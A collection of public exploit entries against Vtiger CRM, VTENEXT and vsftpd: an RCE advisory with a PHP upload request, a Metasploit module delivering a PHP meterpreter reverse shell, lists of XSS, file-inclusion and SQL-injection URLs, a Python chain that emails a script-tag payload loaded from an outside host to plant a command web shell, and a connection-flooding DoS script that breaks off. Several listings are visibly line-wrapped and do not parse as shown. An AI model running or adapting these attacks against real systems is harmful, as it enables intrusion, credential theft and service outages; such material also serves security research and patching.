-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== Description ===
Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.
Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== PoC ===
Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:
POST /index.php HTTP/1.1
Host: [...]
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------51732462825208
Content-Length: 2040
-----------------------------51732462825208
Content-Disposition: form-data; name="__vtrftk"
[...]
-----------------------------51732462825208
Content-Disposition: form-data; name="logo"; filename="2.php"
Content-Type: image/jpeg
<? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
-----------------------------51732462825208
Content-Disposition: form-data; name="address"
[...]
The resulting PHP file can then be accessed at
[Vtiger URL]/test/logo/2.php
- --
Benjamin Daniel MUSSLER
Ix-Xgħajra, Malta Tel (MT) +356 9965 3798
Karlsruhe, Germany Tel (DE) +49 721 989 0150
Web: https://FL7.DE PGP: https://FL7.DE/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (MingW32)
iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
i8fbvZ/RIkuBT0Z79hUV
=gMXq
-----END PGP SIGNATURE-----
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2015-6000 (EDB 38345): an authenticated Vtiger CRM
# administrator can upload a "company logo" that is stored under the filename
# the client supplies, so a .php file lands in a web-reachable directory and is
# executed when requested.
#
# NOTE(review): this listing is a line-wrapped paste. Several string literals
# and two comments are broken across lines (marked below); as shown the file
# does not parse, and it is kept byte-for-byte here rather than reconstructed.
#
# Defender's view: the upload is a POST to index.php carrying module=Vtiger,
# parent=Settings, action=CompanyDetailsSave and a "logo" part whose filename
# ends in .php while its declared Content-Type is image/jpeg; the dropped file
# is then fetched from test/logo/<name>. Validating the stored extension and
# content rather than the declared MIME type, and serving the logo directory
# without script execution, removes the issue.
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
# Module metadata, options and the single target (vTiger CRM v6.3.0).
def initialize(info = {})
super(update_info(info,
'Name' => 'Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload',
'Description' => %q{
Vtiger 6.3.0 CRM's administration interface allows for the upload of
a company logo.
Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and
run this code by accessing the resulting PHP file.
This module was tested against vTiger CRM v6.3.0.
},
# Credits: original discovery and the Metasploit port.
'Author' =>
[
'Benjamin Daniel Mussler', # Discovery
'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-6000'],
['CVE','2016-1713'],
['EDB', '38345']
],
# Plain HTTP by default; payload is a PHP meterpreter, base64-encoded.
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64'
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'vTiger CRM v6.3.0', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 28 2015'))
# TARGETURI: application base path; USERNAME/PASSWORD: the admin account used
# by login. NOTE(review): each of the three description strings below is a
# literal wrapped across two lines by the paste (the newline is inside the
# quotes).
register_options(
[
OptString.new('TARGETURI', [ true, "Base vTiger CRM directory
path", '/']),
OptString.new('USERNAME', [ true, "Username to authenticate
with", 'admin']),
OptString.new('PASSWORD', [ true, "Password to authenticate
with", 'password'])
])
# Some PHP installs run with short_open_tag=On; PHPSHORTTAG makes exploit emit
# the "<? " opener instead of "<?php " (same wrapped-literal caveat as above).
register_advanced_options(
[
OptBool.new('PHPSHORTTAG', [ false, 'Set a short_open_tag
option', false ])
], self.class)
end
# Fingerprint the target: fetch index.php and read the version out of the
# "Powered by vtiger CRM x.y.0" footer.
# Returns Exploit::CheckCode::Vulnerable only for the exact string '6.3.0',
# CheckCode::Detected for any other captured version, CheckCode::Safe when the
# footer is absent, and CheckCode::Unknown when the request fails.
def check
res = nil
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,
'index.php') })
rescue
# bare rescue: StandardError only (connection errors and the like)
vprint_error("Unable to access the index.php file")
return CheckCode::Unknown
end
# NOTE(review): this guard is skipped when res is nil, so the res.body access
# below raises NoMethodError on a missing response; `unless res && res.code == 200`
# would cover both cases.
if res and res.code != 200
vprint_error("Error accessing the index.php file")
return CheckCode::Unknown
end
# `(.*.0)` is a loose capture: the unescaped dot means any version string
# ending in "0" matches, not only x.y.0.
if res.body =~ /<small> Powered by vtiger CRM (.*.0)<\/small>/i
vprint_status("vTiger CRM version: " + $1)
case $1
when '6.3.0'
return Exploit::CheckCode::Vulnerable
else
return CheckCode::Detected
end
end
return CheckCode::Safe
end
# Authenticate as datastore['USERNAME'] / datastore['PASSWORD'].
# Step 1 fetches index.php and scrapes csrfMagicToken out of the page's
# JavaScript; step 2 POSTs token and credentials to module=Users&action=Login.
# Success is a 302 whose Location points at the SystemSetup view, in which case
# the session cookies are returned; every other outcome goes through fail_with.
def login
# Dummy Request for grabbing CSRF token and PHPSESSION ID
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vhost' => "#{rhost}:#{rport}",
})
# Grabbing CSRF token from body: `=~` with a literal regex on the left binds
# the named capture `csrf` as a local (nil when there is no match).
# NOTE(review): unlike the POST below, res is not nil-checked before res.body.
/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
# NOTE(review): wrapped literal — the message spans two lines in the paste.
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
vprint_good("CSRF Token for login: #{csrf}")
# Get Login now.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'module' => 'Users',
'action' => 'Login',
},
'vars_post' => {
'__vtrftk' => csrf,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
},
})
unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
Login request")
end
# NOTE(review): res.headers['Location'] is assumed present on the 302 — a
# redirect without it would raise on include?. Both branches below echo the
# password into the console output; omitting it from the message avoids
# leaving credentials in operator logs.
if res.code == 302 &&
res.headers['Location'].include?("index.php?module=Users&parent=Settings&view=SystemSetup")
vprint_good("Authentication successful:
#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
return res.get_cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed
:[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
return nil
end
end
# Upload a PHP stager as the company logo, then request it to run the payload.
# Flow: login -> pick the PHP opener -> refresh the CSRF token with the session
# cookie -> multipart POST to CompanyDetailsSave -> GET test/logo/<name>.
# The begin/end wrapper has no rescue or ensure clause and so changes nothing.
def exploit
begin
cookie = login
# Random 5..10 letter basename with a .php extension.
pay_name = rand_text_alpha(rand(5..10)) + ".php"
# NOTE(review): the next comment is wrapped by the paste; the bare line that
# follows it is its continuation, not Ruby, and will not parse.
# Make a payload raw. I added this bcz when i making this module.
server have short_open_tag=ON
# NOTE(review): wrapped literal (message spans two lines).
vprint_warning("Payload Generate according to
short_open_tag=#{datastore['PHPSHORTTAG']}")
# Choose the opener. OptBool already yields a boolean, so `== true` is redundant.
if datastore['PHPSHORTTAG'] == true
stager = '<? '
stager << payload.encode
stager << ' ?>'
else
stager = '<?php '
stager << payload.encode
stager << ' ?>'
end
# Again request for CSRF_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vhost' => "#{rhost}:#{rport}",
'cookie' => cookie
})
# Grabbing CSRF token from body (same named-capture idiom as in login;
# res is again not nil-checked first).
/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
vprint_good("CSRF Token for Form Upload: #{csrf}")
# Setting Company Form data. The `content_type = nil` style arguments are
# positional: each assigns a throwaway local and passes that value, they are
# not keyword arguments.
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil,
content_disposition = "form-data; name=\"__vtrftk\"") # CSRF token
post_data.add_part('Vtiger', content_type = nil, transfer_encoding =
nil, content_disposition = "form-data; name=\"module\"")
post_data.add_part('Settings', content_type = nil, transfer_encoding
= nil, content_disposition = "form-data; name=\"parent\"")
post_data.add_part('CompanyDetailsSave', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data; name=\"action\"")
# The logo part: declared Content-Type image/jpeg with a .php filename. The
# server keys off the declared type, which is the root cause. NOTE(review):
# the disposition string is wrapped across lines here as well.
post_data.add_part(stager, content_type = "image/jpeg",
transfer_encoding = nil, content_disposition = "form-data; name=\"logo\";
filename=\"#{pay_name}\"") #payload Content-type bypass
# Remaining company-detail fields are filler required by the form.
post_data.add_part('vtiger', content_type = nil, transfer_encoding =
nil, content_disposition = "form-data; name=\"organizationname\"")
post_data.add_part('95, 12th Main Road, 3rd Block, Rajajinagar',
content_type = nil, transfer_encoding = nil, content_disposition =
"form-data; name=\"address\"")
post_data.add_part('Bangalore', content_type = nil, transfer_encoding
= nil, content_disposition = "form-data; name=\"city\"")
post_data.add_part('Karnataka', content_type = nil, transfer_encoding
= nil, content_disposition = "form-data; name=\"state\"")
post_data.add_part('560010', content_type = nil, transfer_encoding =
nil, content_disposition = "form-data; name=\"code\"")
post_data.add_part('India', content_type = nil, transfer_encoding =
nil, content_disposition = "form-data; name=\"country\"")
post_data.add_part('+91 9243602352', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data; name=\"phonxe\"")
post_data.add_part('+91 9243602352', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data; name=\"fax\"")
post_data.add_part('www.touhidshaikh.com', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data;
name=\"website\"")
post_data.add_part('1234-5678-9012', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data; name=\"vatid\"")
post_data.add_part(' ', content_type = nil, transfer_encoding = nil,
content_disposition = "form-data; name=\"saveButton\"")
data = post_data.to_s
print_good("Payload ready for upload : [ #{pay_name} ]")
print_status("Uploading payload..")
# in Company Logo upload our payload.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vhost' => "#{rhost}:#{rport}",
'cookie' => cookie,
'connection' => 'close',
# NOTE(review): the Referer literal below contains a line break as pasted.
'headers' => {
'Referer' => "http://
#{rhost}:#{rport}/index.php?parent=Settings&module=Vtiger&view=CompanyDetails",
'Upgrade-Insecure-Requests' => '1',
},
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
})
# A 302 is the only accepted sign of a stored file. Failure::None is a
# non-descriptive reason; Failure::UnexpectedReply, as used in login, would be
# consistent. (Wrapped literal again.)
unless res && res.code == 302
fail_with(Failure::None, "#{peer} - File wasn't uploaded,
aborting!")
end
# Cleanup file. NOTE(review): only the bare filename is registered; whether
# FileDropper resolves it against the session's working directory rather than
# test/logo/ is not visible here — confirm.
register_files_for_cleanup(pay_name)
print_status("Executing Payload [
#{rhost}:#{rport}/test/logo/#{pay_name} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "test", "logo", pay_name)
})
# NOTE(review): the following comment is wrapped; the bare word on its
# middle line is a continuation and does not parse.
# If we don't get a 200 when we request our malicious payload, we
suspect
# we don't have a shell, either.
# Only reports; a non-200 here does not abort the module.
if res && res.code != 200
print_error("Unexpected response, probably the exploit failed")
end
disconnect
end
end
end
source: https://www.securityfocus.com/bid/47267/info
vtiger CRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E
source: https://www.securityfocus.com/bid/47263/info
vtiger CRM is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
source: https://www.securityfocus.com/bid/49927/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
/phprint.php?module=Home&action=--><script>alert(/xss/)</script>&parenttab=MyHome Page"><script>alert(0)</script>&jt=
/phprint.php?module=--><script>alert(/xss/)</script>&action=index&parenttab=My%20Home%20Page&jt=
source: https://www.securityfocus.com/bid/50364/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/modules/mobile/index.php?_operation="><script>alert(1)</script>
http://www.example.com/modules/mobile/index.php?_operation=listModuleRecords&module=Services&search="><script>alert(1)</script>
source: https://www.securityfocus.com/bid/49927/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1&return_url="><script>alert(/XSS/)</script>
/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1'"><script>alert(/XSS/)</script>&return_url=1
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01aa8ed'><script>alert(/xss/)</script>e8e16680dfc&query=true&type=dbrd&owner=admin&viewname=10
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-0189b81'><script>alert(1)</script>&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=1
/index.php?module=Calendar&action=EditView&return_module=Contacts&return_action=DetailView&activity_mode=Events&return_id=29&contact_id=><script>alert(1)</script>d3ef7f5e017&account_id=16&parenttab=Marketing
/index.php?module=Potentials&action=ListView&date_closed=2006-01'><script>alert(1)</script>&sales_stage=Other&query=true&type=dbrd&owner=admin&viewname=10
/index.php?action=index&module=Calendar&view=week&hour=0&day=5%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x=%22&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin%27%20onmouseover%3d%27alert(/XSS/)%27%2520x%253d%27&viewname=10
/index.php?module=Potentials&action=ListView&leadsource=--None--'><script>alert(1)</script>&query=true&type=dbrd&viewname=10
/index.php?module=Settings&action=profilePrivileges&mode=view%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&parenttab=Settings&profileid=1
/index.php?module=Calendar&action=EditView&return_module=Leads&return_action=DetailView&activity_mode=Events&return_id=37&parent_id=37"><script>alert(/XSS/)</script>&parenttab=Marketin
/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%3b}}alert(/XSS/)%3bfunction+xss(){x%3d=0;if(x){x%3d1&mode=view
/index.php?module=Campaigns&searchtype=BasicSearch&search_field=campaignname&query=truef1de8%22%20onmouseover%3d%22alert%281%29%22%2007&search_text=test&action=index&parenttab=Marketing&search_cnt=
/index.php?module=Potentials&action=ListView&sales_stage=Prospect'><script>alert(/XSS/)</script>x&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=10
/index.php?action=ListView&module=Calendar&record=116&viewname=19&start=1371b1"%20onmouseover="alert(0)"%20a%3db%22&parenttab=My%20Home%20Page
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&parenttab=My&onlyforuser=1
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=db%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&owner=admin&viewname=10
/index.php?action=index&module=Calendar&view=week'%20onload%3d%22alert%28/XSS/)%22%20x=%22&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%22%20x=%22&subtab=event&parenttab=My&onlyforuser=1
/index.php?module=Calendar&action=CalendarAjax&file=ListView&ajax=changestate&viewname=10"'%20onmouseover=alert(/XSS/)%20x='&errormsg=
/index.php?action=DetailView&module=Calendar&record=116&activity_mode=Task%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&parenttab=My
/index.php?module=Dashboard&action=index&display_view=50%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&pbss_edit=true
/index.php?module=Reports&action=SaveAndRun&record=1&folderid=17920%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
/index.php?module=Settings&action=createnewgroup&returnaction=listgroups&parenttab=Settings&mode=edit&groupId=2%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
/index.php?module=Settings&action=createrole&roleid=H2&parenttab=Settings&mode=edit%22%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
index.php?module=Settings&action=createrole&parenttab=Settings&parent=H%22%20style=%22background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;
/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%22%20style%3dbackground%2dimage%2durl('javascript:alert(0)')%3bwidth:1000px;height:1000px;display:block;%22%20x%3d&mode=view
/index.php?module=Campaigns&action=EditView&record=124&return_module=Campaigns&return_action=index"%20style%3d"x%3aexpression(alert(1))"%20x="s&parenttab=Marketing&return_viewname=29
/index.php?module=Campaigns&action=EditView&record=124&return_module=Campaigns"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&return_action=index&parenttab=Marketing&return_viewname=29
/index.php?module=Settings&action=createnewgroup&returnaction=listgroups"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&parenttab=Settings&mode=edit&groupId=2
/index.php?module=Settings&action=RoleDetailView&roleid=H2"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s
/index.php?module=Settings&action=ModuleManager&module_update=Step1&src_module=Mobile3"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&parenttab=Setting
/index.php?action=index&module=Calendar&view=week"%20style%3d"xss%3aexpression(alert(1))"&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
source: https://www.securityfocus.com/bid/49948/info
vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--
#!/usr/bin/python3
# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE : N/A
# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure
# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default .
# CSRF - No CSRF protections in place.
# exploit.js needs to be hosted somewhere, IP's need to be replaced
# check_csrf() should be changed based on your setup
# run_shell() is a "nice to have"
# content of exploit.js
"""
function insertImage() {
var xhr = new XMLHttpRequest();
xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
xhr.setRequestHeader('Content-Length', '248');
xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
xhr.withCredentials = true;
var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
insertImage();
"""
import smtplib
import datetime
import requests
import os
import time
# Base URL of the lab instance (constructed lab address as published); every
# path built in build_url() and matched in check_csrf() is relative to it.
base_url = "http://192.168.226.168/vtenext19ce/"
# The three CVE ids correspond to the chained issues listed in the header.
print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")
def build_url():
    """Return the upload-folder URL for today.

    Layout: ``<base_url>storage/home/1/<year>/<month name>/week<N>/`` where
    N is today's ISO week number minus the ISO week of the first day of the
    month (presumably mirroring the server's storage layout — see the probe in
    find_shell). Reads the module-level ``base_url``.
    """
    today = datetime.datetime.today()
    first_of_month = today.replace(day=1)
    week_index = today.isocalendar()[1] - first_of_month.isocalendar()[1]
    parts = [
        "storage/home/1",
        str(today.year),
        today.strftime("%B"),
        "week%d" % week_index,
    ]
    return base_url + "/".join(parts) + "/"
def build_mail():
    """Assemble the raw message text: three headers, a blank line, the body.

    The From header carries the script tag that the Messages module renders
    unescaped; the remaining fields are plain text. Returns one string.
    """
    headers = {
        "From": """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'""",
        "To": "admin@example.com",
        "Subject": "Important!",
    }
    body = "While you're reading this, a file is being uploaded to this server."
    header_block = "".join("%s: %s\n" % (name, value) for name, value in headers.items())
    return header_block + "\n" + body
# Hand the crafted message to the lab SMTP relay (constructed lab addresses as
# published). Side effect only; returns None.
# NOTE(review): the SMTP session is never closed (no server.quit()); the socket
# is left to garbage collection.
def send_mail():
msg = build_mail()
smtp_server = '192.168.226.167'
smtp_port = 25
sender = 'user1@lab.local'
receiver = 'admin@lab.local'
server = smtplib.SMTP(smtp_server, smtp_port)
server.sendmail(sender, receiver, msg)
# Block until the victim's browser has fetched exploit.js.
# Polls the last line of the local Apache access log every 0.5 s, so this
# script has to run on the host that serves exploit.js. A hit is a line that
# contains "200", "/exploit.js" and base_url (presumably as the Referer —
# TODO confirm against the log format). There is no timeout.
def check_csrf():
while True:
is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()
if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
print("[>] CSRF triggered")
break
else:
time.sleep(0.5)
continue
# Locate the uploaded file: probe <n>_shell.pht for n in 1..9998 under
# build_url() and return the first URL that answers 200.
# NOTE(review): when nothing answers, the loop falls through and the function
# returns None; run_shell(None) then fails on string concatenation instead of
# reporting the miss. The `else: continue` is redundant.
def find_shell():
print("[>] Locating shell")
time.sleep(1)
tmp1 = build_url()
for i in range(1, 9999):
url = tmp1 + str(i) + "_shell.pht"
r = requests.get(url)
if r.status_code == 200:
print("[>] Found the shell")
print("[-] Location: " + url)
return url
else:
continue
# Interactive loop: read a command until "exit", GET <x>?x=<cmd> and print the
# response body. x is the URL returned by find_shell; cmd is appended without
# URL-encoding.
def run_shell(x):
print("\n")
while True:
cmd = input("shell> ")
if cmd == "exit":
break
else:
url = x + "?x=" + cmd
r = requests.get(url)
print(r.text)
# Driver: send the mail, wait for the recipient to open it (the injected script
# performs the upload), then locate the dropped file and enter the command loop.
print("[>] Sending email")
send_mail()
print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")
# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
# Date: 22-03-2021
# Exploit Author: xynmaps
# Vendor Homepage: https://security.appspot.com/vsftpd.html
# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
# Version: 3.0.3
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
# ASCII banner printed by main() at start-up.
banner = """
._________________.
| VS-FTPD |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
# Usage line shown when no target is given. NOTE(review): the closing ")" after
# DEFAULT:21 is missing; it is a runtime string, so it is left as written.
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
# Spawn one "ftp <host> <port>" client process with its output discarded.
# The Popen handle is neither stored nor waited on, so each call leaves a child
# process behind until it exits on its own; `id` is only referenced by the
# commented-out log line. OSError from process creation is silently dropped.
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
# Entry point (Python 2: bare `print` statements). Reads argv — target, optional
# port (default 21), optional connection count (default 50) — probes the port
# with test(), then starts the connection loop in a thread. loop() and timer()
# are nested here and reference each other through main's scope.
def main():
global target, port, start
print banner
# Each bare except also swallows SystemExit/KeyboardInterrupt from argv parsing.
try:
target = sys.argv[1]
